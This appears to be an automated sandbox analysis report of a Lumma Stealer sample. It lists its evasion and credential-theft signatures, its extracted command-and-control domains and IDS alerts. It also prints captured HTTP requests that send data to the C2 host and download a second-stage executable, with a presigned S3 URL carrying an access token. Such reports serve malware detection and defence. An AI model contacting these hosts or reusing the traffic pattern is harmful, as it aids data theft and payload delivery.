Windows Analysis Report
zLP3oiwG1g.exe

Overview

General Information

Sample name:zLP3oiwG1g.exe
renamed because original name is a hash value
Original sample name:ad848f9eed40c0533c28f2c521395df8.exe
Analysis ID:1579725
MD5:ad848f9eed40c0533c28f2c521395df8
SHA1:4033ed1deb63922a6f73a35204db425fe0d3b559
SHA256:464199a09a215759b285df6462e2cbcfcecf601844c666da6e9de258a0a5d4e9
Tags:exeuser-abuse_ch

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • zLP3oiwG1g.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\zLP3oiwG1g.exe" MD5: AD848F9EED40C0533C28F2C521395DF8)
    • WerFault.exe (PID: 6208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7300 -s 2028 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | - | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration: {"C2 url": ["tentabatte.lat", "slipperyloo.lat", "observerfry.lat", "curverpluch.lat", "bashfulacid.lat", "talkynicer.lat", "wordyfindy.lat", "shapestickyr.lat", "manyrestro.lat"], "Build id": "LOGS11--LiveTraffic"}

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | -
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | -
Process Memory Space: zLP3oiwG1g.exe PID: 7300 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | -
Process Memory Space: zLP3oiwG1g.exe PID: 7300 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
Process Memory Space: zLP3oiwG1g.exe PID: 7300 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | -
Process Memory Space: zLP3oiwG1g.exe PID: 7300 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security | -
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | -
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T08:08:36.728457+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49713 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:38.709148+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49719 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:41.383464+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49725 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:44.094130+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49731 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:46.420577+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49737 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:49.010535+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49743 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:51.511498+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49751 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:56.654674+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49768 | 172.67.199.72 | 443 | TCP
2024-12-23T08:08:59.223387+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49774 | 185.166.143.48 | 443 | TCP
2024-12-23T08:09:01.563690+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49780 | 52.217.67.100 | 443 | TCP
2024-12-23T08:08:37.462740+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49713 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:39.480311+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49719 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:57.453439+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49768 | 172.67.199.72 | 443 | TCP
2024-12-23T08:08:37.462740+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49713 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:39.480311+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.10 | 49719 | 104.21.36.201 | 443 | TCP
2024-12-23T08:08:51.521970+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49751 | 104.21.36.201 | 443 | TCP

AV Detection

Source: zLP3oiwG1g.exe | Avira: detected
Source: zLP3oiwG1g.exe.7300.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["tentabatte.lat", "slipperyloo.lat", "observerfry.lat", "curverpluch.lat", "bashfulacid.lat", "talkynicer.lat", "wordyfindy.lat", "shapestickyr.lat", "manyrestro.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: zLP3oiwG1g.exe | Virustotal: Detection: 57%
Source: zLP3oiwG1g.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: zLP3oiwG1g.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: bashfulacid.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: tentabatte.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: curverpluch.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: talkynicer.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: shapestickyr.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: manyrestro.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: slipperyloo.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: wordyfindy.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: observerfry.lat
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1888292241.00000000003B1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: LOGS11--LiveTraffic
Source: zLP3oiwG1g.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.199.72:443 -> 192.168.2.10:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.10:49774 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.67.100:443 -> 192.168.2.10:49780 version: TLS 1.2
Source: C:\Users\user\Desktop\zLP3oiwG1g.exe | Directory queried: number of queries: 1001

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49713 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49713 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49768 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49751 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49719 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49719 -> 104.21.36.201:443
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Malware configuration extractor | URLs: observerfry.lat
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Joe Sandbox View | IP Address: 185.166.143.48
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49737 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49743 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49731 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49719 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49774 -> 185.166.143.48:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49768 -> 172.67.199.72:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49713 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49751 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49725 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49780 -> 52.217.67.100:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=7KS519323WMYJSP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12835
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=F9JM2P9ZQQ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15032
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=W15LETL8XXHB
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20406
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=DDMTGP5F02YW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1227
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=15G7M9X12XX
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 552953
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 88
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: bitbucket.org
Source: global traffic | HTTP traffic detected:
    GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9HhgDgDv4DamxGztbRL8AaMRtwH4RffwZACiFAqouZ6XFzfcohb2gfVkHH44WWfa%2BbgFPu5g%2BOCDe%2B7GJ3m%2BCwi76mw1w%3D%3D&Expires=1734939406 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: bbuseruploads.s3.amazonaws.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: observerfry.lat
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: observerfry.lat
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: zLP3oiwG1g.exe, 00000000.00000003.1543300122.0000000000356000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1446181758.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.0000000000353000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1467082412.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: zLP3oiwG1g.exe, 00000000.00000003.1618402977.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893736231.0000000005929000.00000002.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: zLP3oiwG1g.exe | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: zLP3oiwG1g.exe, 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/p
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443$$
Source: zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
Source: zLP3oiwG1g.exe, zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/
